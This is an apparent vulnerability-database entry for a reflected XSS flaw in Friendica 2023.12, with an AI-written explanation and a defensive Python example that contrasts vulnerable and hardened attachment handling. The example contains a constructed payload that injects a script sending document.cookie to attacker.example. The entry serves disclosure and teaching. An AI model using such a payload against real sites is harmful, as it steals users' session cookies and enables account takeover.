CVE-2024-27731
Description
Friendica 2023.12 has a reflected XSS in the file attachment parameter due to missing file type filtering, allowing cookie or password hash theft.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
Friendica version 2023.12 contains a reflected Cross-Site Scripting (XSS) vulnerability in the file attachment parameter. Because attachment file types are not filtered, a crafted attachment value is reflected into the page without sanitization, and any JavaScript it carries executes in the victim's browser in the context of the Friendica origin [1].
Exploitation
An attacker exploits this by getting a victim to open a crafted link or to interact with a specially crafted attachment; the injected script runs when the victim loads the attachment or the page that reflects it. Because the script runs in the victim's origin, it can also issue requests on the victim's behalf, giving it the effect of CSRF without the usual same-origin obstacles [1]. The source does not state whether an account is required to plant the attachment.
Impact
Successful exploitation enables the attacker to steal an administrator's session cookie (where the cookie is not flagged HttpOnly) or a regular user's password hash, leading to account takeover and potential compromise of the entire Friendica instance [1].
Mitigation
No fixed version was identified at the time of disclosure; the vendor was reportedly notified, but the fix status is unknown [1]. Until a fixed release is available, operators should restrict attachments to an allowlist of file types (excluding anything a browser renders as an active document, such as HTML or SVG), encode the attachment parameter for the HTML or URL context it is rendered into, and serve user uploads with a server-determined Content-Type, Content-Disposition: attachment and X-Content-Type-Options: nosniff so that the browser never treats an upload as a page. Setting HttpOnly on session cookies limits cookie theft, but does not stop the other actions an injected script can perform.
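The following is an added illustration of the weakness described under Vulnerability and of the mitigation above; it is not Friendica's code and does not reproduce the actual CVE-2024-27731 trigger. It contrasts a handler that reflects an unfiltered attachment parameter into markup with a hardened version that allowlists the file type, escapes the value for its output context, and builds download-safe response headers. The payload, the allowlist and the function names are constructed for the example.

```python
import html
import re
from urllib.parse import quote

# Server-side allowlist of attachment types (constructed for this example).
# Types a browser may render as an active document (html, svg, xml, xhtml)
# are deliberately absent: an "attachment" that is really HTML or SVG is the
# usual way to get script execution from an attachment endpoint.
ALLOWED_TYPES = {
    "png": "image/png",
    "jpg": "image/jpeg",
    "jpeg": "image/jpeg",
    "gif": "image/gif",
    "webp": "image/webp",
    "pdf": "application/pdf",
    "txt": "text/plain; charset=utf-8",
}

# Constructed payload: an attachment parameter that closes the attribute it
# lands in and injects script. Illustrative only, not the CVE's proof of concept.
PAYLOAD = 'x.html"><script>fetch("https://attacker.example/?c="+document.cookie)</script>'


def render_attachment_link_vulnerable(name: str) -> str:
    """Weak pattern: the request parameter goes straight into markup and any
    file type is accepted, so a crafted value becomes reflected XSS."""
    return f'<a href="/attach/{name}">{name}</a>'


def validate_attachment_name(name: str) -> str:
    """Return the bare file name if it passes the allowlist, else raise ValueError."""
    base = re.split(r"[\\/]", name)[-1]  # drop any path component
    if not re.fullmatch(r"[A-Za-z0-9][A-Za-z0-9._-]{0,127}", base):
        raise ValueError("attachment name contains disallowed characters")
    if "." not in base:
        raise ValueError("attachment has no extension")
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_TYPES:
        raise ValueError(f"attachment type '{ext}' is not allowed")
    return base


def is_rejected(name: str) -> bool:
    """True if the allowlist refuses the name (convenience for checks)."""
    try:
        validate_attachment_name(name)
        return False
    except ValueError:
        return True


def render_attachment_link_hardened(name: str) -> str:
    """Same link, but the value is allowlisted first and then encoded for each
    context it lands in: URL path segment in href, HTML text in the body."""
    safe = validate_attachment_name(name)
    return f'<a href="/attach/{quote(safe)}">{html.escape(safe)}</a>'


def attachment_response_headers(name: str) -> dict:
    """Headers for serving the stored file: the MIME type comes from the
    server-side allowlist (never from the client), the file is forced to
    download, and content sniffing and active content are disabled."""
    safe = validate_attachment_name(name)
    ext = safe.rsplit(".", 1)[1].lower()
    return {
        "Content-Type": ALLOWED_TYPES[ext],
        "Content-Disposition": f'attachment; filename="{safe}"',
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


if __name__ == "__main__":
    print("vulnerable:", render_attachment_link_vulnerable(PAYLOAD))
    print("hardened  :", render_attachment_link_hardened("photo.png"))
    print("payload rejected:", is_rejected(PAYLOAD))
    print("svg rejected    :", is_rejected("avatar.svg"))
    print(attachment_response_headers("notes.txt"))
```

The two controls are independent and both matter: the allowlist stops active document types from ever being stored, while the headers guarantee that even a misclassified file is downloaded rather than rendered in the Friendica origin. Escaping is still required on the link because an allowlisted name is only safe for the contexts the regex was written for.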
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products: 2
Patches: 0
No patches discovered yet.
Vulnerability mechanics
No source-code context for this CVE. Mechanics are only generated when the actual fix diff can be read; without it, the four sections (root cause, attack vector, affected code, fix) would be speculation rather than analysis.
References: 2
News mentions: 0
No linked articles in our index yet.